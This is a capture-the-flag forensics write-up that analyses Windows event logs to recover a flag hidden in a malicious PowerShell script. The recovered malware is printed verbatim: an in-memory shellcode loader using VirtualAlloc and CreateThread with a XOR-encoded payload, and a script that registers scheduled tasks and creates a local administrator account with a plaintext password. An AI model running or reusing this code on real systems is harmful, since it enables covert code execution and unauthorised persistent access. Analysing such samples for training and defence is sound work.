Posted on May 19, 2022
tl;dr: PowerShell deobfuscation


This was mostly an exploration of how to do things both on the host system (Windows) and in Linux, like reading the event logs. The route taken is not necessarily the quickest, but it was fun to experiment with various ways of doing things.


Each challenge had a story tied to it, for this challenge it was:

Planet Longhir is known for its top-tier researchers. Due to their dedication in science and engineering, their military equipment is the most advanced one in the galaxy.
In fact, the prototype DES-3000, a self-propelled precision-strike missile that is capable of reaching targets even in Ratnik galaxy, is being used to disable Galactic Federation’s communication satellites.
The mystery that Miyuki is trying to solve is, how the satellite’s location was leaked since it is a top-secret that only Galactic Federation’s council is aware of. Help her analyse the Council’s HQ event logs and solve this mystery.

Attack the challenge

There’s a downloadable file:
containing Windows logs, which need to be analyzed to see how the satellite location was leaked. We assume that we are looking for some type of GPS coordinates or lat/long.

The usual suspects:

grep -iR "HTB{" .       # returned nothing  
grep -iR "satelite" .   # returned nothing  
grep -iR "lat" .        # returned two files, both reported as binary:  

grep: ./Microsoft-Windows-LiveId%4Operational.evtx: binary file matches  
grep: ./Microsoft-Windows-Store%4Operational.evtx: binary file matches

Analyzing the “LiveId Operational” log seems to show some type of communication with tokens and such. Probably a rabbit hole.

Next try:
The files are all named differently, with an annoying %4 and spaces in the names, so rename all of them and strip the spaces from the filenames.
Afterwards, use the program: to convert all the .evtx files to JSON.

A small script to fix the filenames:

# directory holding the exported .evtx files  
LOGDIR=/mnt/hgfs/VMSHARED/HTB/cyberApocalypse2022/forensics/puppeteer/Logs/test  
# glob instead of $(ls ...) so names containing spaces stay intact,  
# and strip both the spaces and the "%4" sequence in one pass  
for fil in "$LOGDIR"/*.evtx; do  
    newname=$(printf '%s' "$fil" | sed -e 's/ //g' -e 's/%4//g')  
    [ "$fil" != "$newname" ] && mv -- "$fil" "$newname"  
done  

And, to avoid doing everything manually, convert every .evtx to JSON in a loop:

#evtx_dump -f <output_file> -o json <input_file>  
for FIL in *.evtx; do  
    ./evtx_dump-v0.7.2-x86_64-unknown-linux-gnu -f "$FIL.json" -o json "$FIL"  
done  

A lot of the JSON files were empty, so let's clear those out:

mkdir JSON  
mv *.json JSON/  
find JSON/ -empty -type f -delete

Start searching through the JSON to see whether we can find some more interesting strings:

grep -iR "HQ" .  

Looking for special_orders.ps1 led to some more interesting content, such as:

./Microsoft-Windows-PowerShellOperational.evtx.json: "ScriptBlockText":

 "$OleSPrlmhB = @\"\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\r\n\"@\r\n\r\n[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;\r\n[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;\r\n\r\n$tNZvQCljVk = Add-Type -memberDefinition $OleSPrlmhB -Name \"Win32\" -namespace Win32Functions -passthru;\r\n\r\n[Byte[]] $HVOASfFuNSxRXR = 0x2d,0x99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0xd1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x03,0xb4,0x99,0x5a,0x83,0xb1,0x99,0x5a,0x83,0xc9,0x80,0x87,0x99,0x5a,0x83,0xf1,0x99,0xde,0x66,0x9b,0x9b,0x9c,0xe0,0x18,0x99,0x5a,0xa3,0x81,0x99,0xe0,0x11,0x7d,0xed,0xb0,0xad,0xd3,0xfd,0xf1,0x90,0x10,0x18,0xdc,0x90,0xd0,0x10,0x33,0x3c,0x83,0x99,0x5a,0x83,0xf1,0x90,0x80,0x5a,0x93,0xed,0x99,0xd0,0x01,0xb7,0x50,0xa9,0xc9,0xda,0xd3,0xde,0x54,0xa3,0xd1,0xd1,0xd1,0x5a,0x51,0x59,0xd1,0xd1,0xd1,0x99,0x54,0x11,0xa5,0xb6,0x99,0xd0,0x01,0x5a,0x99,0xc9,0x81,0x95,0x5a,0x91,0xf1,0x98,0xd0,0x01,0x32,0x87,0x99,0x2e,0x18,0x9c,0xe0,0x18,0x90,0x5a,0xe5,0x59,0x99,0xd0,0x07,0x99,0xe0,0x11,0x90,0x10,0x18,0xdc,0x7d,0x90,0xd0,0x10,0xe9,0x31,0xa4,0x20,0x9d,0xd2,0x9d,0xf5,0xd9,0x94,0xe8,0x00,0xa4,0x09,0x89,0x95,0x5a,0x91,0xf5,0x98,0xd0,0x01,0xb7,0x90,0x5a,0xdd,0x99,0x95,0x5a,0x91,0xcd,0x98,0xd0,0x01,0x90,0x5a,0xd5,0x59,0x90,0x89,0x90,0x89,0x8f,0x88,0x99,0xd0,0x01,0x8b,0x90,0x89,0x90,0x88,0x90,0x8b,0x99,0x52,0x3d,0xf1,0x90,0x83,0x2e,0x31,0x89,0x90,0x88,0x8b,0x99,0x5a,0xc3,0x38,0x9a,0x2e,0x2e,0x2e,0x8c,0x98,0x6f,0xa6,0xa2,0xe3,0x8e,0xe2,0xe3,0xd1,0xd1,0x90,0x87,0x98,0x58,0x37,0x99,0x50,0x3d,0x71,0xd0,0xd1,0xd1,0x98
,0x58,0x34,0x98,0x6d,0xd3,0xd1,0xd4,0xe8,0x11,0x79,0xd1,0xc3,0x90,0x85,0x98,0x58,0x35,0x9d,0x58,0x20,0x90,0x6b,0x9d,0xa6,0xf7,0xd6,0x2e,0x04,0x9d,0x58,0x3b,0xb9,0xd0,0xd0,0xd1,0xd1,0x88,0x90,0x6b,0xf8,0x51,0xba,0xd1,0x2e,0x04,0xbb,0xdb,0x90,0x8f,0x81,0x81,0x9c,0xe0,0x18,0x9c,0xe0,0x11,0x99,0x2e,0x11,0x99,0x58,0x13,0x99,0x2e,0x11,0x99,0x58,0x10,0x90,0x6b,0x3b,0xde,0x0e,0x31,0x2e,0x04,0x99,0x58,0x16,0xbb,0xc1,0x90,0x89,0x9d,0x58,0x33,0x99,0x58,0x28,0x90,0x6b,0x48,0x74,0xa5,0xb0,0x2e,0x04,0x54,0x11,0xa5,0xdb,0x98,0x2e,0x1f,0xa4,0x34,0x39,0x42,0xd1,0xd1,0xd1,0x99,0x52,0x3d,0xc1,0x99,0x58,0x33,0x9c,0xe0,0x18,0xbb,0xd5,0x90,0x89,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xaf,0x84,0x99,0x52,0x15,0xf1,0x8f,0x58,0x27,0xbb,0x91,0x90,0x88,0xb9,0xd1,0xc1,0xd1,0xd1,0x90,0x89,0x99,0x58,0x23,0x99,0xe0,0x18,0x90,0x6b,0x89,0x75,0x82,0x34,0x2e,0x04,0x99,0x58,0x12,0x98,0x58,0x16,0x9c,0xe0,0x18,0x98,0x58,0x21,0x99,0x58,0x0b,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xac,0xf9,0x89,0x90,0x86,0x88,0xb9,0xd1,0x91,0xd1,0xd1,0x90,0x89,0xbb,0xd1,0x8b,0x90,0x6b,0xda,0xfe,0xde,0xe1,0x2e,0x04,0x86,0x88,0x90,0x6b,0xa4,0xbf,0x9c,0xb0,0x2e,0x04,0x98,0x2e,0x1f,0x38,0xed,0x2e,0x2e,0x2e,0x99,0xd0,0x12,0x99,0xf8,0x17,0x99,0x54,0x27,0xa4,0x65,0x90,0x2e,0x36,0x89,0xbb,0xd1,0x88,0x98,0x16,0x13,0x21,0x64,0x73,0x87,0x2e,0x04;\r\n\r\n[array]::Reverse($stage2);\r\n\r\n$hRffYLENA = $tNZvQCljVk::VirtualAlloc(0,[Math]::Max($HVOASfFuNSxRXR.Length,0x1000),0x3000,0x40);\r\n\r\n$stage3 = $stage1 + $stage2;\r\n\r\n[System.Runtime.InteropServices.Marshal]::Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);\r\n\r\n\r\n# Unpack Shellcode;\r\n\r\nfor($i=0; $i -lt $HVOASfFuNSxRXR.count ; $i++)\r\n{\r\n $HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;\r\n}\r\n\r\n#Unpack Special Orders!\r\n\r\nfor($i=0;$i -lt $stage3.count;$i++){\r\n $stage3[$i] = $stage3[$i] -bxor 0xd1;\r\n}\r\n\r\n$tNZvQCljVk::CreateThread(0,0,$hRffYLENA,0,0,0);\r\n"

Further investigation of the files containing HQ:

In the file Microsoft-Windows-PowerShellOperational.evtx there were signs of a backup_op administrator account being created, and scheduled tasks registered to sabotage Miyuki:

Log Name: Microsoft-Windows-PowerShell/Operational  
Source: Microsoft-Windows-PowerShell  
Date: 2022-05-06 17:43:51  
Event ID: 4104  
Task Category: Execute a Remote Command  
Level: Warning  
Keywords: None  
User: S-1-5-21-2389065719-3342106636-307857974-1002  
Computer: Council-HQ  
Creating Scriptblock text (1 of 1):  
# Create a new task action  
$taskAction = New-ScheduledTaskAction -Execute 'powershell.exe';  
$taskTrigger = New-ScheduledTaskTrigger -Daily -At 3PM;  
# The name of your scheduled task.  
$taskName = "Elevate Powers"  
# Describe the scheduled task.  
$description = "Steal weapons"  
# Register the scheduled task  
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Description $description  
# Create a new task action  
$taskAction = New-ScheduledTaskAction -Execute 'powershell.exe';  
$taskTrigger = New-ScheduledTaskTrigger -Daily -At 3PM;  
# The name of your scheduled task.  
$taskName = "Sabotage Miyuki"  
# Describe the scheduled task.  
$description = "Bypass Arms Embargo"  
# Register the scheduled task  
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Description $description  
#start windows update service  
Get-Service -Name wuauserv | Start-Service -Verbose  
#delete childs  
Get-ChildItem "C:\Windows\SoftwareDistribution\*" -Recurse -Force -Verbose -ErrorAction SilentlyContinue | remove-item -force -Verbose -recurse -ErrorAction SilentlyContinue  
#clear temp folder  
Get-ChildItem "C:\users\*\AppData\Local\Temp\*" -Recurse -Force -ErrorAction SilentlyContinue |  
Where-Object { ($_.CreationTime -lt $(Get-Date).AddDays(-$DaysToDelete))} |  
remove-item -force -Verbose -recurse -ErrorAction SilentlyContinue  
cleanmgr /sagerun:12  
do {  
"waiting for cleanmgr to complete. . ."  
start-sleep 5  
} while ((get-wmiobject win32_process | where-object {$_.processname -eq ‘cleanmgr.exe’} | measure).count)  
# Create Admin Account  
function Create-NewLocalAdmin {  
param (  
[string] $NewLocalAdmin,  
[securestring] $Password  
begin {  
process {  
New-LocalUser "$NewLocalAdmin" -Password $Password -FullName "$NewLocalAdmin" -Description "Temporary local admin"  
Write-Verbose "$NewLocalAdmin local user crated"  
Add-LocalGroupMember -Group "Administrators" -Member "$NewLocalAdmin"  
Write-Verbose "$NewLocalAdmin added to the local administrator group"  
end {  
$NewLocalAdmin = "backup_op";  
$Password = ConvertTo-SecureString "sup3rk3y" -AsPlainText -Force;  
Create-NewLocalAdmin -NewLocalAdmin $NewLocalAdmin -Password $Password

Save the special_orders.ps1 script and modify the code so that only the unpacking of the special orders is run:

[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;  
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;  
# the original script reverses stage2 before joining; without this step the second half comes out backwards  
[array]::Reverse($stage2);  
$stage3 = $stage1 + $stage2;  
#Unpack Special Orders!  
for ($i = 0; $i -lt $stage3.count; $i++) {  
    $stage3[$i] = $stage3[$i] -bxor 0xd1;  
}  
write-host $stage3

Run the PowerShell script and get the characters as decimal output:

72 84 66 123 98 51 119 104 52 114 51 95 48 102 95 116 104 51 95 98 48 48 116 53 95 48 102 95 106 117 115 116 49 99 51 46 46 46 125

Run that through CyberChef with decimal to ASCII and get:

Flag: HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3...}
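The same unpacking done outside PowerShell, as an added example that is not part of the original writeup: a small Python script that pulls the `[byte[]]` arrays, the `[array]::Reverse` call and the `-bxor` key straight out of a logged ScriptBlockText and replays them. It assumes the script block has already been extracted from the evtx_dump JSON (e.g. with json.loads), and the embedded sample is a constructed excerpt of the block shown above with the long shellcode array left out.

```python
import re

# Constructed excerpt of the logged ScriptBlockText: the two short arrays and
# the "special orders" unpack loop from the page; the shellcode array is omitted.
SCRIPT_BLOCK = r'''
[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;
[array]::Reverse($stage2);
$stage3 = $stage1 + $stage2;
for($i=0;$i -lt $stage3.count;$i++){
 $stage3[$i] = $stage3[$i] -bxor 0xd1;
}
'''

# [byte[]] $name = 0x.., 0x.., ...;   (case-insensitive: the log also uses [Byte[]])
ARRAY_RE = re.compile(r'\[byte\[\]\]\s*\$(\w+)\s*=\s*((?:0x[0-9a-fA-F]{2}\s*,?\s*)+);', re.I)
REVERSE_RE = re.compile(r'\[array\]::Reverse\(\$(\w+)\)')
CONCAT_RE = re.compile(r'\$(\w+)\s*=\s*\$(\w+)\s*\+\s*\$(\w+);')
XOR_RE = re.compile(r'-bxor\s*0x([0-9a-fA-F]{2})')


def parse_byte_arrays(text):
    """Return {name: bytes} for every [byte[]] assignment in the script block."""
    arrays = {}
    for name, body in ARRAY_RE.findall(text):
        arrays[name] = bytes(int(h, 16) for h in re.findall(r'0x([0-9a-fA-F]{2})', body))
    return arrays


def unpack_special_orders(text):
    """Replay the script's own steps: reverse, concatenate, then XOR with the logged key."""
    arrays = parse_byte_arrays(text)
    for name in REVERSE_RE.findall(text):          # [array]::Reverse($stage2)
        arrays[name] = arrays[name][::-1]
    key = int(XOR_RE.search(text).group(1), 16)    # 0xd1 in this log
    m = CONCAT_RE.search(text)                     # $stage3 = $stage1 + $stage2
    if m:
        dst, a, b = m.groups()
        arrays[dst] = arrays[a] + arrays[b]
        target = dst
    else:                                          # no concat: decode the largest array
        target = max(arrays, key=lambda n: len(arrays[n]))
    return bytes(c ^ key for c in arrays[target])


if __name__ == "__main__":
    plain = unpack_special_orders(SCRIPT_BLOCK)
    print(" ".join(str(b) for b in plain))   # same decimal list Write-Host printed
    print(plain.decode("ascii"))
```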